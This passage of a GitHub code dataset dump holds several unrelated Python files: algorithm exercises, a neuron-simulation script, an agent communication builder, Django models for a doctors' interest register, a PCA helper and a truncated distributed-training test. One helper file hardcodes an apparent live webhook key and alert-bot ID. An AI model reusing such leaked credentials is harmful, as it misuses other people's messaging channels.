\"function\": pack,\n },\n )\n","repo_name":"ProjectNu11/Null","sub_path":"library/depend/function_call.py","file_name":"function_call.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"31969577575","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass LinkList(object):\n def __init__(self):\n # 先初始化一个头节点,为None\n self.head = None\n\n # 链表初始化函数, 方法类似于尾插\n def initList(self, data):\n # 创建头结点\n # 这个节点创建完,包含两部分:是个既包含节点值,也包含节点所链接的下一个节点\n self.head = ListNode(data[0])\n\n # 初始化p指向头节点\n p = self.head\n # 逐个为 data 内的数据创建结点, 建立链表\n for i in data[1:]:\n node = ListNode(i)\n p.next = node\n # 构建完一个节点,移动到构建完的节点上,继续向后构建节点\n p = p.next\n\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n if not lists:\n return []\n if len(lists)==1:\n return lists[0]\n dummy_head = self.mergeTwoList(lists[0], lists[1])\n for i in range(2, len(lists)):\n dummy_head = self.mergeTwoList(dummy_head, lists[i])\n return dummy_head\n \n def mergeTwoList(self, list1, list2):\n dummy_head = ListNode(None)\n cur = dummy_head\n while list1 and list2:\n while list1 and list2 and list1.val<=list2.val:\n cur.next = list1\n cur = cur.next\n list1 = list1.next\n while list1 and list2 and list1.val>list2.val:\n cur.next = list2\n cur = cur.next\n list2 = list2.next\n if list1:\n cur.next = list1\n if list2:\n cur.next = list2\n return dummy_head.next\n \n\nl1 = LinkList()\nl2 = LinkList()\nl3 = LinkList()\nl1.initList([1,4,5])\nl2.initList([1,3,4])\nl3.initList([2,6])\n\nsolution = Solution()\nsolution.mergeKLists([l1.head, l2.head, l3.head])\n ","repo_name":"wangshuo6699/codetop","sub_path":"algorithm/19.mergeKLists.py","file_name":"19.mergeKLists.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25084110937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 10 11:37:12 2020\n\n@author: mak\n\"\"\"\n\n#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom HH import HH\nfrom Analyze_Function import analyze\n\n#%% Run example HH, for 0.5 s, and 10 trials (SLOW).\nA_tonic = 10\nA_sin = 5\nA_noise = 2\nT = 0.5\nK = 10\n[V,spike_train,I,t] = HH(A_tonic, A_sin, A_noise, T, K)\n\n#%% # Example plots of voltage for two trials.\nplt.plot(t,V[0,:], 'r')\nispikes = np.where(spike_train[0,:]==1)\nplt.plot(t[ispikes],np.transpose(spike_train[0,ispikes]),'ko')\nplt.plot(t,I[0,:], 'b')\n\n#%% # Analyze the results\nresults = analyze(V,spike_train, I, t, plots=True)\n\n#%% # Additional plots\nplt.plot(results['faxis'],results['Snn'])\nplt.xlim([0,200]);","repo_name":"Mark-Kramer/BU-MA665-MA666","sub_path":"Final-Project/Final_Project_Analysis.py","file_name":"Final_Project_Analysis.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"17144188738","text":"import random\nfrom copy import deepcopy\nfrom typing import Dict, List\n\nimport numpy as np\n\nfrom app.core.environment.cluster.cluster_properties import (\n AgentsCommunicationProperties,\n)\n\n\nclass AgentCommunicationBuilder:\n \"\"\"\n Builds a communication graph between agents. The communication graph determines the agents with whom a\n particular agent can communicate during the simulation. There are four communication modes implemented:\n - neighbours: agents can communicate with their closest neighbours in a circular fashion.\n - closed_groups: agents are grouped into sets, each set containing a maximum of max_nb_agents_communication\n agents, and agents can communicate only with agents within the same set.\n - random_fixed: agents are connected to a fixed number of other agents, drawn randomly with replacement\n from the entire set of agents.\n - neighbours_2D: agents can communicate with their neighbours in a 2D grid.\n\n\n Attributes:\n agents_comm_props: AgentsCommunicationProperties\n The properties of the agents' communication.\n nb_comm: int\n The maximum number of agents that each agent can communicate with.\n nb_agents: int\n The total number of agents.\n agent_ids: List[int]\n The list of IDs of all agents.\n\n \"\"\"\n\n def __init__(\n self,\n agents_comm_props: AgentsCommunicationProperties,\n nb_agents: int,\n ) -> None:\n \"\"\"\n Initialize an instance of the AgentCommunicationBuilder class.\n\n Parameters:\n - agents_comm_props: An instance of the AgentsCommunicationProperties class which stores the properties of the communication between agents.\n - nb_agents: The number of agents in the simulation.\n \"\"\"\n self.agents_comm_props = agents_comm_props\n self.nb_comm = np.minimum(\n agents_comm_props.max_nb_agents_communication,\n (nb_agents - 1),\n )\n self.nb_agents = nb_agents\n self.agent_ids = list(range(nb_agents))\n\n def get_comm_link_list(self) -> Dict[int, List[int]]:\n \"\"\"\n Return a dictionary with the IDs of agents as keys and a list of IDs of agents with which they can communicate as values.\n \"\"\"\n mode = getattr(self, self.agents_comm_props.mode)\n return mode()\n\n def neighbours(self) -> Dict[int, List[int]]:\n \"\"\"\n Get the neighbours of each agent in a circular fashion,\n if agent_id is 5:\n the half before will be [0, 1, 2, 3, 4]\n and half after will be [6, 7, 8, 9, 10]\n if agent_id is 1:\n the half before will be [7, 8, 9, 10, 0]\n and half after will be [2, 3, 4, 5, 6]\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n for agent_id in self.agent_ids:\n half_before = [\n (agent_id - int(np.floor(self.nb_comm / 2)) + i) % len(self.agent_ids)\n for i in range(int(np.floor(self.nb_comm / 2)))\n ]\n half_after = [\n (agent_id + 1 + i) % len(self.agent_ids)\n for i in range(int(np.ceil(self.nb_comm / 2)))\n ]\n ids_houses_messages = half_before + half_after\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def closed_groups(self) -> Dict[int, List[int]]:\n \"\"\"\n Return a dictionary with the IDs of agents as keys and a list of IDs of agents with which they can communicate within the same group.\n Agents are grouped into sets, each containing a maximum of max_nb_agents_communication agents.\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n\n for agent_id in self.agent_ids:\n base = agent_id - (agent_id % (self.nb_comm + 1))\n if base + self.nb_comm <= len(self.agent_ids):\n ids_houses_messages = [\n base + i\n for i in range(\n self.agents_comm_props.max_nb_agents_communication + 1\n )\n ]\n else:\n ids_houses_messages = [\n len(self.agent_ids) - self.nb_comm - 1 + i\n for i in range(self.nb_comm + 1)\n ]\n ids_houses_messages.remove(agent_id)\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def random_sample(self) -> Dict[int, List[int]]:\n \"\"\"\n This method is intended to return a dictionary with the IDs of agents as keys and a list of IDs of\n randomly selected agents with which they can communicate.\n \"\"\"\n return {}\n\n def random_fixed(self) -> Dict[int, List[int]]:\n \"\"\"\n Returns a dictionary with the IDs of agents as keys and a list of IDs of randomly selected agents with which\n they can communicate. Each agent is connected to a fixed number of other agents,\n drawn randomly with replacement from the entire set of agents.\n \"\"\"\n agent_communicators: Dict[int, List[int]] = {}\n for agent_id in self.agent_ids:\n agent_communicators[agent_id] = self.get_random_sample(agent_id)\n return agent_communicators\n\n def neighbours_2D(self) -> Dict[int, List[int]]:\n \"\"\"\n Returns a dictionary with the IDs of agents as keys and a list of IDs of neighbouring agents with which they can communicate in a 2D grid.\n The communication distance is limited by the max_communication_distance parameter and the row size is specified by the row_size parameter.\n \"\"\"\n if len(self.agent_ids) % self.agents_comm_props.row_size != 0:\n # TODO: put this in validator of model\n raise ValueError(\"Neighbours 2D row_size must be a divisor of nb_agents\")\n\n max_y = len(self.agent_ids) // self.agents_comm_props.row_size\n if (\n self.agents_comm_props.max_communication_distance\n >= (self.agents_comm_props.row_size + 1) // 2\n or self.agents_comm_props.max_communication_distance >= (max_y + 1) // 2\n ):\n # TODO: put this in validator of model\n raise ValueError(\n \"Neighbours 2D distance_comm ({}) must be strictly smaller than (row_size+1) / 2 ({}) and (max_y+1) / 2 ({})\".format(\n self.agents_comm_props.max_communication_distance,\n (self.agents_comm_props.row_size + 1) // 2,\n (max_y + 1) // 2,\n )\n )\n\n distance_pattern = []\n for x_diff in range(\n -1 * self.agents_comm_props.max_communication_distance,\n self.agents_comm_props.max_communication_distance + 1,\n ):\n for y_diff in range(\n -1 * self.agents_comm_props.max_communication_distance,\n self.agents_comm_props.max_communication_distance + 1,\n ):\n if abs(x_diff) + abs(\n y_diff\n ) <= self.agents_comm_props.max_communication_distance and (\n x_diff != 0 or y_diff != 0\n ):\n distance_pattern.append((x_diff, y_diff))\n agent_communicators: Dict[int, List[int]] = {}\n\n for agent_id in self.agent_ids:\n x = agent_id % self.agents_comm_props.row_size\n y = agent_id // self.agents_comm_props.row_size\n ids_houses_messages = []\n for pair_diff in distance_pattern:\n x_new = x + pair_diff[0]\n y_new = y + pair_diff[1]\n if x_new < 0:\n x_new += self.agents_comm_props.row_size\n if x_new >= self.agents_comm_props.row_size:\n x_new -= self.agents_comm_props.row_size\n if y_new < 0:\n y_new += max_y\n if y_new >= max_y:\n y_new -= max_y\n agent_id_new = y_new * self.agents_comm_props.row_size + x_new\n ids_houses_messages.append(agent_id_new)\n agent_communicators[agent_id] = ids_houses_messages\n return agent_communicators\n\n def get_random_sample(self, agent_id) -> List[int]:\n \"\"\"\n Returns a list of `nb_comm` randomly selected agent IDs, excluding the given `agent_id`.\n\n Parameters:\n agent_id (int): The ID of the agent to exclude from the possible IDs that can be selected.\n\n Returns:\n List[int]: A list of `nb_comm` randomly selected agent IDs, excluding the given `agent_id`.\n \"\"\"\n possible_ids = deepcopy(self.agent_ids)\n possible_ids.remove(agent_id)\n return random.sample(possible_ids, k=self.nb_comm)\n","repo_name":"ALLabMTL/marl-demandresponse","sub_path":"server/app/core/environment/cluster/agent_communication_builder.py","file_name":"agent_communication_builder.py","file_ext":"py","file_size_in_byte":8827,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"1315168787","text":"import pygame\r\nfrom math import sqrt, sin, pi, atan, cos\r\nfrom random import randrange\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((600, 600))\r\nw, h = screen.get_width(), screen.get_height()\r\nmirror = 6\r\nangle = pi / 3\r\nmin_range = -4\r\nmax_range = -min_range + 1\r\nsolid = [[w / 2, h / 2]]\r\n\r\n\r\ndef distance(x, y, x1, y1):\r\n return sqrt((x - x1) ** 2 + (y - y1) ** 2)\r\n\r\n\r\nstart_y = h / 2\r\n\r\n\r\ndef special_add(x, y):\r\n y1 = -(h / 2 - y)\r\n # prototype = [[x, y1], [x, y]]\r\n angle1 = atan(y / x)\r\n angle2 = atan(y1 / x)\r\n length = distance(x, y, w / 2, h / 2)\r\n\r\n for i in range(mirror):\r\n solid.append([length * cos(i * angle + angle1) + w / 2, length * sin(i * angle + angle1) + start_y])\r\n solid.append([length * cos(i * angle + angle2) + w / 2, length * sin(i * angle + angle2) + start_y])\r\n\r\n\r\nclass snowflake:\r\n def __init__(self, x_=w, y_=start_y, st=False):\r\n self.x = x_\r\n self.y = y_\r\n self.vx = -0.1\r\n self.stuck = st\r\n self.radius = 2\r\n\r\n def move(self):\r\n self.x -= 1\r\n self.y += randrange(min_range, max_range)\r\n max_a = h / 2 - (self.x - w / 2) * sin(angle / 2)\r\n if self.y > h / 2:\r\n self.y = h / 2\r\n elif self.y < max_a:\r\n self.y = max_a\r\n\r\n def show(self):\r\n pygame.draw.circle(screen, (255, 255, 255), (self.x, self.y), self.radius)\r\n\r\n def collision(self, others):\r\n if not self.stuck:\r\n for v in others:\r\n if v is not self and v.stuck:\r\n if distance(self.x, self.y, v.x, v.y) <= self.radius + v.radius:\r\n self.stuck = True\r\n return self.x, self.y\r\n return None, None\r\n\r\n\r\ncrystal = [snowflake(w / 2, h / 2, True)]\r\ncounter = 0\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n break\r\n screen.fill((0, 0, 0))\r\n\r\n for c in crystal:\r\n px, py = c.collision(crystal)\r\n if not c.stuck:\r\n c.move()\r\n else:\r\n c.show()\r\n if px is not None:\r\n special_add(px, py)\r\n\r\n\r\n for s in solid:\r\n pygame.draw.circle(screen, (255, 255, 255), (s[0], s[1]), 2)\r\n\r\n if counter % 100 == 0 and counter < 40000:\r\n crystal.append(snowflake())\r\n counter += 1\r\n pygame.display.update()\r\n","repo_name":"Sierpinski22/Python-Projects","sub_path":"Simulazioni/Brownian_snowflake/B_snowflake.py","file_name":"B_snowflake.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7823793350","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n l = []\n def inorderSuccessor(self, root, p):\n self.help(root)\n if p not in self.l:\n return False\n if self.l.index(p) == len(self.l) - 1:\n return False\n return self.l[self.l.index(p) + 1]\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :rtype: TreeNode\n \"\"\"\n def help(self, node):\n if node == None:\n return\n self.help(node.left)\n self.l.append(node.val)\n self.help(node.right)\n","repo_name":"YihaoGuo2018/leetcode_Python","sub_path":"Inorder Successor in BST.py","file_name":"Inorder Successor in BST.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9862318292","text":"from unittest.mock import Mock\n\n\nclass InfraFacadeMock(Mock):\n def __init__(self):\n super(InfraFacadeMock, self).__init__()\n self.io_factory = Mock()\n self.server = Mock()\n self.player = Mock()\n self.media_factory = Mock()\n self.service_factory = Mock()\n","repo_name":"Tastyep/Pi-OpenCast","sub_path":"test/shared/infra/facade_mock.py","file_name":"facade_mock.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"11993121188","text":"\"\"\"\nModels for Sunshine UK.\n\"\"\"\nimport datetime as dt\nimport hashlib\nimport random\n\nfrom django.conf import settings\nfrom django.urls import reverse, reverse_lazy\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom doctors import send_mail\n\n\nclass Doctor(models.Model):\n name = models.CharField(max_length=200)\n gmc_number = models.CharField(max_length=100, unique=True, verbose_name=\"GMC Number\")\n job_title = models.CharField(max_length=200)\n primary_employer = models.CharField(max_length=200)\n employment_address = models.TextField()\n email = models.EmailField(blank=True, null=True)\n\n def __str__(self):\n return f'{self.name} - {self.gmc_number}'\n\n def get_absolute_url(self):\n return reverse('doctor-detail', kwargs={'pk': self.pk})\n\n def to_dict(self):\n return dict(\n name=self.name,\n gmc_number=self.gmc_number,\n job_title=self.job_title,\n primary_employer=self.primary_employer,\n employment_address=self.employment_address,\n declarations=[d.to_dict() for d in self.declaration_set.all()]\n )\n\n def send_declaration_thanks(self):\n \"\"\"\n Send this doctor an Email thanking them for their declaration,\n Explaining that if this is their frist submission it will not\n turn up for 24 hours, and with a link.\n \"\"\"\n if settings.DEBUG:\n print(\"=\" * 20)\n print(\"email sent\")\n print(\"=\" * 20)\n else:\n send_mail.send_mail(\n to_emails=[self.email],\n subject=\"Sunshine UK - Thanks for your declaration\",\n template=\"email/declaration_thanks.html\",\n template_context={\n \"settings\": settings,\n \"doctor\": self,\n \"register\": reverse('doctor-list')\n }\n )\n return\n\n def get_archived_declarations(self):\n return self.declaration_set.all().order_by('-date_created')\n\n\nclass Declaration(models.Model):\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n interests = models.BooleanField(default=False)\n past_declarations = models.TextField(blank=True, null=True)\n other_declarations = models.TextField(blank=True, null=True)\n date_created = models.DateField(default=dt.date.today)\n dt_created = models.DateTimeField(default=dt.datetime.now)\n\n def __str__(self):\n return f'{self.doctor} - {self.date_created}'\n\n def to_dict(self):\n return dict(\n date=self.date_created.strftime('%Y-%m-%dT%H:%M:%S'),\n past_declarations=self.past_declarations,\n other_declarations=self.other_declarations,\n benefits=dict(\n pharma=[b.to_dict() for b in self.pharmabenefit_set.all()],\n othermedical=[b.to_dict() for b in self.othermedicalbenefit_set.all()],\n fee=[b.to_dict() for b in self.feebenefit_set.all()],\n grant=[b.to_dict() for b in self.grantbenefit_set.all()]\n )\n )\n\n @property\n def nothing_to_declare(self):\n the_things = (self.pharmabenefit_set.count() == 0,\n self.othermedicalbenefit_set.count() == 0,\n self.feebenefit_set.count() == 0,\n self.grantbenefit_set.count() == 0,\n not self.past_declarations,\n not self.other_declarations)\n return all(the_things)\n\n\nclass Benefit(models.Model):\n BAND_CHOICES = (\n (1, u'under \\u00a3100'),\n (2, u'\\u00a3100- \\u00a31000'),\n (3, u'\\u00a31000- \\u00a32000'),\n (4, u'\\u00a32000 - \\u00a35000'),\n (5, u'\\u00a35000 - \\u00a310000'),\n (6, u'\\u00a310000 - \\u00a350 000'),\n (7, u'\\u00a350000- \\u00a3100000'),\n (8, u'\\u00a3100000+'),\n )\n\n class Meta:\n abstract = True\n\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n declaration = models.ForeignKey(\n Declaration, blank=True, null=True,\n on_delete=models.SET_NULL\n )\n company = models.CharField(max_length=200)\n reason = models.CharField(max_length=200)\n band = models.IntegerField(choices=BAND_CHOICES)\n\n def to_dict(self):\n return dict(\n company=self.company,\n reason=self.reason,\n band=self.get_band_display()\n )\n\nclass PharmaBenefit(Benefit): pass\nclass OtherMedicalBenefit(Benefit): pass\nclass FeeBenefit(Benefit): pass\nclass GrantBenefit(Benefit): pass\n\ndef random_token(extra=None, hash_func=hashlib.sha256):\n if extra is None:\n extra = []\n bits = extra + [str(random.SystemRandom().getrandbits(512))]\n return hash_func(\"\".join(bits).encode('utf-8')).hexdigest()[:8]\n\ndef in_one_day():\n now = dt.datetime.now()\n then = now + dt.timedelta(days=1)\n return then\n\ndef in_two_weeks():\n now = dt.datetime.now()\n then = now + dt.timedelta(days=14)\n return then\n\n\nclass DeclarationLink(models.Model):\n email = models.EmailField(unique=True)\n expires = models.DateTimeField(default=in_two_weeks)\n key = models.CharField(max_length=64, unique=True, default=random_token)\n\n @property\n def expired(self):\n \"\"\"\n Has this link expired already?\n \"\"\"\n return self.expires < timezone.now()\n\n def expire_tomorrow(self):\n \"\"\"\n Update the expires date to be tomorrow.\n \"\"\"\n self.expires = in_one_day()\n self.save()\n\n def absolute_url(self):\n return 'http://{0}/declare/{1}'.format(settings.DEFAULT_DOMAIN, self.key)\n\n def send(self):\n \"\"\"\n Send the link to this email.\n \"\"\"\n if settings.DEBUG:\n print(\"=\" * 20)\n print(self.absolute_url())\n print(\"=\" * 20)\n else:\n send_mail.send_mail(\n to_emails=[self.email],\n subject='Sunshine UK - Edit your public record',\n template=\"email/edit_public_record.html\",\n template_context={\n \"link\": self,\n }\n )\n\n def new_key(self):\n self.key = random_token()[:8]\n self.save()\n return\n\n\nclass WorkDetails(models.Model):\n CAREER_CHOICES = (\n (\"Academic\", \"Academic\"),\n (\"NHS\", \"NHS\"),\n (\"Private clinical work\", \"Private clinical work\")\n )\n dt_created = models.DateTimeField(auto_now_add=True)\n declaration = models.ForeignKey(\n \"DetailedDeclaration\", on_delete=models.CASCADE\n )\n category = models.CharField(\n verbose_name=\"Position type\",\n choices=CAREER_CHOICES,\n max_length=256\n )\n institution = models.CharField(max_length=200, blank=True, null=True)\n job_title = models.CharField(max_length=200, blank=True, null=True)\n\n\nclass DetailedDeclaration(models.Model):\n BAND_CHOICES = (\n (\n u'under \\u00a3100',\n u'under \\u00a3100'\n ),\n (\n u'\\u00a3100- \\u00a31000',\n u'\\u00a3100- \\u00a31000'\n ),\n (\n u'\\u00a31000- \\u00a32000',\n u'\\u00a31000- \\u00a32000'\n ),\n (\n u'\\u00a32000 - \\u00a35000',\n u'\\u00a32000 - \\u00a35000'\n ),\n (\n u'\\u00a35000 - \\u00a310000',\n u'\\u00a35000 - \\u00a310000'\n ),\n (\n u'\\u00a310000 - \\u00a350 000',\n u'\\u00a310000 - \\u00a350 000'\n ),\n (\n u'\\u00a350000- \\u00a3100000',\n u'\\u00a350000- \\u00a3100000'\n ),\n (\n u'\\u00a3100000+',\n u'\\u00a3100000+'\n )\n )\n\n dt_created = models.DateTimeField(auto_now_add=True)\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n for_year = models.IntegerField()\n nothing_to_declare = models.BooleanField(default=False)\n\n class Meta:\n ordering = [\"-for_year\", \"-dt_created\"]\n\n # Consultancy categories\n consultancy = models.BooleanField(default=False)\n consultancy_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n pharmaceutical_companies = models.BooleanField(default=False)\n technology_companies = models.BooleanField(default=False)\n consultancy_other = models.BooleanField(\n default=False, verbose_name=\"other\"\n )\n consultancy_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Academic categories\n academic = models.BooleanField(\n default=False,\n verbose_name=\"academic_relationships\"\n )\n academic_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n research_grants = models.BooleanField(default=False)\n academic_other = models.BooleanField(default=False)\n academic_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Other work categories\n other_work = models.BooleanField(default=False)\n other_work_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n public_relations = models.BooleanField(default=False)\n commercial_relationships = models.BooleanField(default=False)\n media = models.BooleanField(default=False)\n other_work_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Financial categories\n financial = models.BooleanField(default=False)\n financial_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n patents_owned = models.BooleanField(\n default=False, verbose_name=\"patents owned/part owned\"\n )\n shares = models.BooleanField(\n default=False, verbose_name=\"shares/stocks/company ownership\"\n )\n financial_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Spousal/family\n spousal = models.BooleanField(\n default=False, verbose_name=\"spousal/family\"\n )\n spousal_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n spousal_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Sponsored/educational events\n sponsored = models.BooleanField(\n default=False,\n verbose_name=\"sponsored/educational events\"\n )\n sponsored_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n conferences = models.BooleanField(\n default=False\n )\n meals = models.BooleanField(\n default=False,\n verbose_name=\"meals/hospitality/travel\"\n )\n sponsored_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # political affiliations\n political = models.BooleanField(\n default=False,\n verbose_name=\"political/membership organisations of note\"\n )\n political_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n political_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n def get_absolute_url(self):\n return reverse('doctor-detail', kwargs={'pk': self.doctor.pk})\n","repo_name":"openhealthcare/whopaysthisdoctor.org","sub_path":"doctors/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26939799370","text":"import requests\nfrom pprint import pformat\n\n\ndef send_qiyeweixin(content):\n url = \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=fc8f03cc-f81c-4269-bfda-c976c1d770ff\"\n headers = {'content-type': 'application/json'}\n data = {\"msgtype\": \"text\",\n \"text\": {\"content\": str(pformat(content))}}\n requests.post(url, json=data, headers=headers)\n\n\ndef send_tv(content):\n url = \"https://tv-service-alert.kuainiu.chat/alert\"\n headers = {'content-type': 'application/json'}\n data = {\"botId\": \"043be9e1-d720-4186-b5aa-debf1ee238d3\",\n \"message\": str(content)}\n requests.post(url, json=data, headers=headers)\n\n\nif __name__ == \"__main__\":\n # send_qiyeweixin(\"test\\ntest\")\n send_tv(\"test\\ntest\")\n # send_qiyeweixin([\"11111111111\", \"111erfdgfefer ferf erf e 2\", \"erwer wer wef we we w wev wevfwevwevewv3\"])\n","repo_name":"xiujingyuan/jc-mock","sub_path":"app/tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29816708800","text":"import numpy as np\n\ndef PCA(X: np.ndarray, threshold: float = None, num_dim: int = None) -> np.ndarray:\n \"\"\"\n Uses Principal Component Analysis to reduce dimensionality of dataset X usually either\n a threshold variance OR the number of dimensions.\n X: The dataset to be transformed, rows being datapoints and columns are features\n threshold: The explained variance [0,1] that is retained in the reduced dimensions.\n ex. 0.95 will return a reduced dataset where the eigenvectors still account for at\n least 95% of the variance in the data. \n num_dim: The number of dimensions to reduce X into.\n \"\"\"\n if threshold is None and num_dim is None:\n raise TypeError(\"Must specify a variance threshold or the number of dimensions.\")\n if threshold is not None and num_dim is not None:\n raise TypeError(\"Cannot specify both a variance threshold and number of dimensions.\")\n # Mean-centers the data\n X_centered = X - X.mean(axis = 0)\n # Gets the covariance matrix\n X_cov = np.cov(X_centered, rowvar=False)\n # eigh works faster for symmetric matrices\n eig_values, eig_vectors = np.linalg.eigh(X_cov)\n\n # The values are already sorted in ascending order, needs to be descending\n eig_values = eig_values[::-1]\n eig_vectors = eig_vectors[:,::-1]\n\n # Threshold\n if threshold is not None:\n new_dim = 0\n sum_eigv = np.sum(eig_values)\n # Gets the explained variance\n explained_variances = list(map(lambda x: x / sum_eigv, eig_values))\n th = 0\n for i in range(len(eig_values)):\n th += explained_variances[i]\n if th >= threshold:\n new_dim = i+1\n break\n # Given number of dimensions\n else:\n new_dim = num_dim\n\n # Reduces the eigenvectors\n reduced_eig_vectors = eig_vectors[:,:new_dim]\n # Calculates the reduced dataset\n X_reduced = (reduced_eig_vectors.T @ X_centered.T).T\n\n return X_reduced\n\nif __name__ == '__main__':\n import pandas as pd\n\n # Reads the iris dataset\n df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n # Gets the pure data and converts to numpy array\n df_np = df.iloc[:,0:4].to_numpy()\n\n # Performs PCA\n reduced_df_np = PCA(df_np, threshold=0.95)\n #reduced_df_np = PCA(df_np, num_dim=2)\n\n print('New dimension count: {}'.format(reduced_df_np.shape[1]))\n\n \n\n","repo_name":"mclaager/ML-Algorithms","sub_path":"utils/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40700416361","text":"from functools import partial\n\nimport pytest\nimport torch\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.testing import assert_close\n\nimport colossalai\nfrom colossalai.tensor import ProcessGroup\nfrom colossalai.testing import parameterize, rerun_if_address_is_in_use\nfrom colossalai.utils import free_port, get_current_device\nfrom colossalai.utils.model.colo_init_context import ColoInitContext\nfrom colossalai.zero import LowLevelZeroOptimizer\nfrom tests.test_tensor.common_utils import set_seed, split_param_col_tp1d, split_param_row_tp1d, tensor_shard_equal\n\n\ndef strict_shard_equal(tensor, shard, tp_pg, rtol=1e-3, atol=1e-4):\n return tensor_shard_equal(tensor, shard, tp_pg.tp_local_rank(), tp_pg.tp_world_size(), rtol, atol)\n\n\nclass MlpModel(nn.Module):\n\n def __init__(self):\n super(MlpModel, self).__init__()\n self.linear1 = nn.Linear(32, 128)\n self.act = nn.GELU()\n self.linear2 = nn.Linear(128, 32)\n\n def forward(self, x):\n y = self.linear1(x)\n y = self.act(y)\n y = self.linear2(y)\n return x + y\n\n\n@parameterize(\"overlap_flag\", [False, True])\n@parameterize(\"partition_flag\", [False, True])\ndef exam_zero_with_tp(overlap_flag, partition_flag):\n set_seed(233010)\n tp_pg = ProcessGroup(tp_degree=2)\n\n with ColoInitContext(device=get_current_device(), default_pg=tp_pg):\n hybrid_model = MlpModel()\n torch_model = MlpModel().cuda()\n for pt, ph in zip(torch_model.parameters(), hybrid_model.parameters()):\n pt.data.copy_(ph.data)\n\n for name, param in hybrid_model.named_parameters():\n if 'linear1' in name:\n split_param_row_tp1d(param, tp_pg)\n param.compute_spec.set_output_replicate(False)\n if 'linear2.weight' in name:\n split_param_col_tp1d(param, tp_pg)\n\n torch_model = DDP(torch_model, device_ids=[tp_pg.rank()], process_group=tp_pg.dp_process_group())\n torch_optim = torch.optim.Adam(torch_model.parameters(), lr=1e-2) # set to 1e-2 for torch-1.11\n hybrid_optim = torch.optim.Adam(hybrid_model.parameters(), lr=1e-2)\n hybrid_optim = LowLevelZeroOptimizer(hybrid_optim,\n initial_scale=2,\n clip_grad_norm=1.0,\n overlap_communication=overlap_flag,\n partition_grad=partition_flag)\n\n dp_local_rank = tp_pg.dp_local_rank()\n set_seed(255 + dp_local_rank)\n\n data = torch.randn(8, 32, device=get_current_device())\n torch_loss = torch_model(data).sum()\n hybrid_loss = hybrid_model(data).sum()\n assert_close(torch_loss, hybrid_loss)\n\n torch_loss.backward()\n torch.nn.utils.clip_grad_norm_(torch_model.parameters(), 1.0)\n hybrid_optim.backward(hybrid_loss)\n\n torch_optim.step()\n hybrid_optim.step()\n\n for (name, pt), ph in 